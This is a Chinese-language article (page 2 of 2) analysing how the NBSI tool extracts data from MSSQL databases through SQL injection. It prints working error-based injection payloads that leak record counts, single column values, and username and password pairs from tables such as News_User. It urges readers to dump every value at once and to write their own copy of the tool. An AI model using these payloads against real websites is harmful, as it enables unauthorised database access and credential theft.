NBSI 注入分析跟踪报告(MSSQL篇)

6 猜解数据

下面我们来看看NBSI是如何猜解数据的，按道理应该是“暴”，让我们期待一下牛人是如何暴数据的。

1） 得到字段的记录个数

And%20(Select%20Cast(Count(1)%20as%20varchar(8000))%2Bchar(97)%20From%20[News_Style]%20Where%201=1)>0

其中红色的News_Style代表我们要猜解的表名，这里作者用到了一个常用的暴表技巧。我们得到了字段数以后，字段是个INT类型的值，他和0比较是不会发生类型转换错误的。换句话说，记录就不会自动的“招”。如果我们在和0比较的时候实现就把把它和Char(97)//字符a 相连接，那么我们得到的就会是个字符串了。和零比较的时候自然就暴出了“记录个数”+a 这样一个数值来。现在大家该明白为什么第一步的刺探要加一个”|”符号了吧！谜底解开了。

2） 得到字段的值

得到了记录个数，然后不断的循环而暴出字段的值。还好，作者没用什么奇特的招数。作者的代码为：
And (Select Top 1 isNull(cast([sName] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 9 sName From [News_Style] Where 1=1 Order by sName) T Order by sName desc)>0 

红色的news_style我不多解释了，就是要猜解的数据表名，绿色的9表示要得到第就 sname字段的第9条记录的值。循环几次，呵呵！数据就到手了。

大家注意一下：char(124)这个东西。它的目的也在于把数据统统转化为字符串类型然后和int类型进行比较，然后暴出数据。道理如前所述！这就是NBSI为什么在得到的字段里面有”|”这样的值的原因。作者也许懒得处理罢了。：-）

看到了吗？后面都有”|”符号。 

3） 关于双数据和N个数据的猜测

大家也许觉得，NBSI猜测数据字段的值的速度很快，跟踪分析了一下，的确不错。假设我们要猜测一个表的2个字段的值。那么我们该如何写代码呢？

NBSI的代码是这样写的：

第一步还是用１）的办法得到记录个数。第二步就用： 
And (Select Top 1 isNull(cast([UserName] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([PassWord] as varchar(8000)),char(32)) From (Select Top 1 UserName,PassWord From [News_User] Where 1=1 Order by UserName,PassWord) T Order by UserName desc,PassWord desc)>0 

（注意看|符号隔开了2个数值）

News_user是一个表名，Char(124)我就不多解释了。大家可以照着猫画虎，把上面的语句和2）里面的语句进行对比一下。具有基本地球人功能的我想都能看出来作者是怎么暴多字段值的了吧。如果你高兴，一次把数据库的值都暴出来都无所谓。这里间接的提醒一下大家：暴一个字段的值的网络开销和暴全部的值的网络开销差不了多少，下次玩NBSI的时候记得把所有的值都挂上吧！ 

总结：有希望完成自己VB代码的朋友可能根据我们分析的结果编写程序，你们也将拥有属于自己的NBSI。如今的HUIE就具有这样的功能。 

后序：

写程序最重要的就是编程思路，也许你看到的只是编写一个好程序的部分细节罢了。大家有没意思到，NBSI是如何判断网站能否注入的呢？其实单靠SQL暴错只是一个思路罢了。NBSI给我们展现的两种思路是：

2 判断IIS的报头 以正常返回200,101 为基础，如果返回500则表示出现了错误。

3 逐字逐句的判断IIS的返回信息，然后自己对比是否有注入的可能性！（因为，有些网站返回的HTML信息量是非常大的！用程序判断仍然很费时间，不推荐）

更多的东西，其实我们还需要学习。不光是暴库，搞注入

上一页  [1] [2]